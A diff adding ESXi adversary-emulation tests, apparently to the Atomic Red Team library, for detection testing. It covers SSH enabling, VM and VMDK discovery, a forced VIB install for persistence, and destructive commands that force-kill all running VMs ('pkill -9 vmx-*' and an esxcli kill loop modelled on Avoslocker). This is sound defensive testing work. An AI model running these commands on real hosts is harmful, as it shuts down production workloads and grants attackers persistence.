ESXi ART Tests Batch 1

atomics/T1021.004/T1021.004.yaml

@@ -0,0 +1,43 @@
+attack_technique: T1021.004
+display_name: 'Remote Services: SSH'
+atomic_tests:
+- name: ESXi - Enable SSH via PowerCLI
+  auto_generated_guid: 8f6c14d1-f13d-4616-b7fc-98cc69fe56ec
+  description: |
+    An adversary enables the SSH service on a ESXi host to maintain persistent access to the host and to carryout subsequent operations.
+  supported_platforms:
+  - linux
+  input_arguments:
+    vm_host:
+      description: Specify the host name of the ESXi Server
+      type: string
+      default: atomic.local
+    vm_user:
+      description: Specify the privilege user account on ESXi Server
+      type: string
+      default: root
+    vm_pass:
+      description: Specify the privilege user password on ESXi Server
+      type: string
+      default: pass
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Check if VMWARE PowerCLI PowerShell Module is installed.
+    prereq_command: |
+      $RequiredModule = Get-Module -Name VMware.PowerCLI -ListAvailable
+      if (-not $RequiredModule) {exit 1}
+    get_prereq_command: |
+      Install-Module -Name VMware.PowerCLI
+  executor:
+    command: |
+      Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false 
+      Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
+      Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
+
+    cleanup_command: |
+      Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false 
+      Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
+      Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Stop-VMHostService -Confirm:$false
+    name: powershell
+    elevation_required: true

atomics/T1082/T1082.yaml

@@ -446,3 +446,87 @@ atomic_tests:
       reg query HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System /v SystemBiosVersion
       reg query HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System /v VideoBiosVersion
     name: command_prompt
+- name: ESXi - VM Discovery using ESXCLI
+  auto_generated_guid: 2040405c-eea6-4c1c-aef3-c2acc430fac9
+  description: |
+    An adversary will using ESXCLI to enumerate the Virtual Machines on the host prior to executing power off routine.
+    [Reference](https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/)
+  supported_platforms:
+  - linux
+  input_arguments:
+    vm_host:
+      description: Specify the host name or IP of the ESXi Server
+      type: string
+      default: atomic.local
+    vm_user:
+      description: Specify the privilege user account on ESXi Server
+      type: string
+      default: root
+    vm_pass:
+      description: Specify the privilege user password on ESXi Server
+      type: string
+      default: pass
+    plink_file:
+      description: Path to Plink
+      type: path
+      default: 'PathToAtomicsFolder\..\ExternalPayloads\plink.exe'
+    cli_script:
+      description: Path to file with discovery commands
+      type: path
+      default: PathToAtomicsFolder\T1082\src\esx_vmdiscovery.txt
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Check if plink is available.
+    prereq_command: |
+      if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+    get_prereq_command: |
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+  executor:
+    command: |
+       echo "" | "#{plink_file}" "#{vm_host}" -ssh  -l "#{vm_user}" -pw "#{vm_pass}" -m "#{cli_script}"
+    name: command_prompt
+    elevation_required: false
+- name: ESXi - Darkside system information discovery
+  auto_generated_guid: f89812e5-67d1-4f49-86fa-cbc6609ea86a
+  description: |
+    Darkside ransomware utilises various ESXCLI commands to obtain information about the ESXi Host.
+    [Reference](https://www.trendmicro.com/en_ph/research/21/e/darkside-linux-vms-targeted.html)
+  supported_platforms:
+  - linux
+  input_arguments:
+    vm_host:
+      description: Specify the host name or IP of the ESXi Server
+      type: string
+      default: atomic.local
+    vm_user:
+      description: Specify the privilege user account on ESXi Server
+      type: string
+      default: root
+    vm_pass:
+      description: Specify the privilege user password on ESXi Server
+      type: string
+      default: pass
+    plink_file:
+      description: Path to Plink
+      type: path
+      default: 'PathToAtomicsFolder\..\ExternalPayloads\plink.exe'
+    cli_script:
+      description: Path to file containing darkside ransomware discovery commands
+      type: path
+      default: PathToAtomicsFolder\T1082\src\esx_darkside_discovery.txt
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Check if plink is available.
+    prereq_command: |
+      if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+    get_prereq_command: |
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+  executor:
+    command: |
+       echo "" | "#{plink_file}" "#{vm_host}" -ssh  -l "#{vm_user}" -pw "#{vm_pass}" -m "#{cli_script}"
+    name: command_prompt
+    elevation_required: false

atomics/T1082/src/esx_darkside_discovery.txt

@@ -0,0 +1,6 @@
+esxcli --formatter=csv --format-param=fields=="Device,DevfsPath" storage core device list
+esxcli --formatter=csv storage filesystem list
+esxcli --format-param=fields=="WorldID,DisplayName" vm process list
+esxcli vsan debug vmdk list
+esxcli --format-param=fields=="Type,ObjectUUID,Configuration" vsan debug object list
+exit

atomics/T1082/src/esx_vmdiscovery.txt

@@ -0,0 +1,2 @@
+esxcli --formatter=csv --format-param=fields=="WorldID,DisplayName" vm process list
+exit

atomics/T1083/T1083.yaml

@@ -149,3 +149,45 @@ atomic_tests:
       Start-Sleep -Second 4
       Stop-Process -Name "DirLister"
     name: powershell
+- name: ESXi - Enumerate VMDKs available on an ESXi Host
+  auto_generated_guid: 4a233a40-caf7-4cf1-890a-c6331bbc72cf
+  description: |
+   An adversary uses the find command to enumerate vmdks on an ESXi host.
+   [Reference](https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/)
+  supported_platforms:
+  - linux
+  input_arguments:
+    vm_host:
+      description: Specify the host name of the ESXi Server
+      type: string
+      default: atomic.local
+    vm_user:
+      description: Specify the privilege user account on ESXi Server
+      type: string
+      default: root
+    vm_pass:
+      description: Specify the privilege user password on ESXi Server
+      type: string
+      default: pass
+    plink_file:
+      description: Path to Plink
+      type: path
+      default: 'PathToAtomicsFolder\..\ExternalPayloads\plink.exe'
+    cli_script:
+      description: Path to script with file discovery commands
+      type: path
+      default: PathToAtomicsFolder\T1083\src\esxi_file_discovery.txt  
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Check if plink is available.
+    prereq_command: |
+      if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+    get_prereq_command: |
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+  executor:
+    command: |
+       echo "" | "#{plink_file}" "#{vm_host}" -ssh  -l "#{vm_user}" -pw "#{vm_pass}" -m "#{cli_script}"
+    name: command_prompt
+    elevation_required: false

atomics/T1083/src/esxi_file_discovery.txt

@@ -0,0 +1,2 @@
+find /vmfs/volumes/ -type f -name "*.vmdk"
+exit

atomics/T1129/T1129.yaml

@@ -0,0 +1,62 @@
+attack_technique: T1129
+display_name: 'Server Software Component'
+atomic_tests:
+- name: ESXi - Install a custom VIB on an ESXi host 
+  auto_generated_guid: 7f843046-abf2-443f-b880-07a83cf968ec
+  description: |
+    An adversary can maintain persistence within an ESXi host by installing malicious vSphere Installation Bundles (VIBs).
+    [Reference](https://www.mandiant.com/resources/blog/esxi-hypervisors-malware-persistence)
+  supported_platforms:
+  - windows
+  input_arguments:
+    vm_host:
+      description: Specify the host name of the ESXi Server
+      type: string
+      default: atomic.local
+    vm_user:
+      description: Specify the privilege user account on ESXi Server
+      type: string
+      default: root
+    vm_pass:
+      description: Specify the privilege user password on ESXi Server
+      type: string
+      default: pass
+    plink_file:
+      description: Path to plink
+      type: path
+      default: 'PathToAtomicsFolder\..\ExternalPayloads\plink.exe'
+    pscp_file:
+      description: Path to Pscp
+      type: path
+      default: 'PathToAtomicsFolder\..\ExternalPayloads\pscp.exe'
+    vib_install:
+      description: Path to script with commands to install the vib
+      type: path
+      default: PathToAtomicsFolder\..\atomics\T1129\src\esxi_vibinstall.txt
+    vib_remove:
+      description: Path to script with commands to remove the vib
+      type: path
+      default: PathToAtomicsFolder\..\atomics\T1129\src\esxi_vibremove.txt
+    vib_file:
+      description: Path to the dummy vib
+      type: path
+      default: PathToAtomicsFolder\..\atomics\T1129\src\atomicvibes.vib
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Check if plink and pscp are available.
+    prereq_command: |
+      if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+      if (Test-Path "#{pscp_file}") {exit 0} else {exit 1}
+    get_prereq_command: |
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\plink.exe"
+      Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/pscp.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\pscp.exe"
+  executor:
+    command: |
+       #{pscp_file} -pw #{vm_pass} #{vib_file} #{vm_user}@#{vm_host}:/tmp
+       echo "" | "#{plink_file}" "#{vm_host}" -ssh  -l "#{vm_user}" -pw "#{vm_pass}" -m "#{vib_install}"
+    cleanup_command: |
+       echo "" | "#{plink_file}" "#{vm_host}" -ssh  -l "#{vm_user}" -pw "#{vm_pass}" -m "#{vib_remove}"
+    name: command_prompt
+    elevation_required: false

atomics/T1129/src/esxi_vibinstall.txt

@@ -0,0 +1,2 @@
+esxcli software vib install -v /tmp/atomicvibes.vib -f
+exit

atomics/T1129/src/esxi_vibremove.txt

@@ -0,0 +1,2 @@
+esxcli software vib remove --vibname=atomicvibes.vib 
+exit

atomics/T1529/T1529.yaml

@@ -156,3 +156,87 @@ atomic_tests:
       shutdown /l 
     name: command_prompt
     elevation_required: true
+- name: ESXi - Terminates VMs using pkill
+  auto_generated_guid: 987c9b4d-a637-42db-b1cb-e9e242c3991b
+  description: |
+    In VMWARE ESXi, process names starting with vmx are associated with running VMs. An adversary can use the pkill command to kill all processes with a prefix vmx.
+    [Reference](https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/)
+  supported_platforms:
+  - linux
+  input_arguments:
+    vm_host:
+      description: Specify the host name of the ESXi Server
+      type: string
+      default: atomic.local
+    vm_user:
+      description: Specify the privilege user account on ESXi Server
+      type: string
+      default: root
+    vm_pass:
+      description: Specify the privilege user password on ESXi Server
+      type: string
+      default: pass
+    plink_file:
+      description: Path to plink
+      type: path
+      default: 'PathToAtomicsFolder\..\ExternalPayloads\plink.exe'
+    cli_script:
+      description: Path to text with commands
+      type: path
+      default: PathToAtomicsFolder\T1529\src\esx_pkill.txt  
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Check if plink is available.
+    prereq_command: |
+      if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+    get_prereq_command: |
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+  executor:
+    command: |
+       echo "" | "#{plink_file}" "#{vm_host}" -ssh  -l "#{vm_user}" -pw "#{vm_pass}" -m "#{cli_script}"
+    name: command_prompt
+    elevation_required: false
+- name: ESXi - Avoslocker enumerates VMs and forcefully kills VMs
+  auto_generated_guid: 189f7d6e-9442-4160-9bc3-5e4104d93ece
+  description: |
+    Avoslocker malware has inbuilt functionality to enumerate the VM instances and uses the esxcli command to forcefully power off them.
+    [Reference](https://blogs.vmware.com/security/2022/02/avoslocker-modern-linux-ransomware-threats.html)
+  supported_platforms:
+  - linux
+  input_arguments:
+    vm_host:
+      description: Specify the host name of the ESXi Server
+      type: string
+      default: atomic.local
+    vm_user:
+      description: Specify the privilege user account on ESXi Server
+      type: string
+      default: root
+    vm_pass:
+      description: Specify the privilege user password on ESXi Server
+      type: string
+      default: pass
+    plink_file:
+      description: Path to plink
+      type: path
+      default: 'PathToAtomicsFolder\..\ExternalPayloads\plink.exe'
+    cli_script:
+      description: Path to text with commands
+      type: path
+      default: PathToAtomicsFolder\T1529\src\esx_avoslocker_kill_vm.txt  
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Check if plink is available.
+    prereq_command: |
+      if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+    get_prereq_command: |
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+  executor:
+    command: |
+       echo "" | "#{plink_file}" "#{vm_host}" -ssh  -l "#{vm_user}" -pw "#{vm_pass}" -m "#{cli_script}"
+    name: command_prompt
+    elevation_required: false

atomics/T1529/src/esx_avoslocker_kill_vm.txt

@@ -0,0 +1,2 @@
+esxcli --formatter=csv --format-param=fields=="WorldID,DisplayName" vm process list | tail -n +2 | awk -F ',' '{system("esxcli vm process kill --type=force --world-id=" $1)}'
+exit

atomics/T1529/src/esx_pkill.txt

@@ -0,0 +1,2 @@
+pkill -9 vmx-*
+exit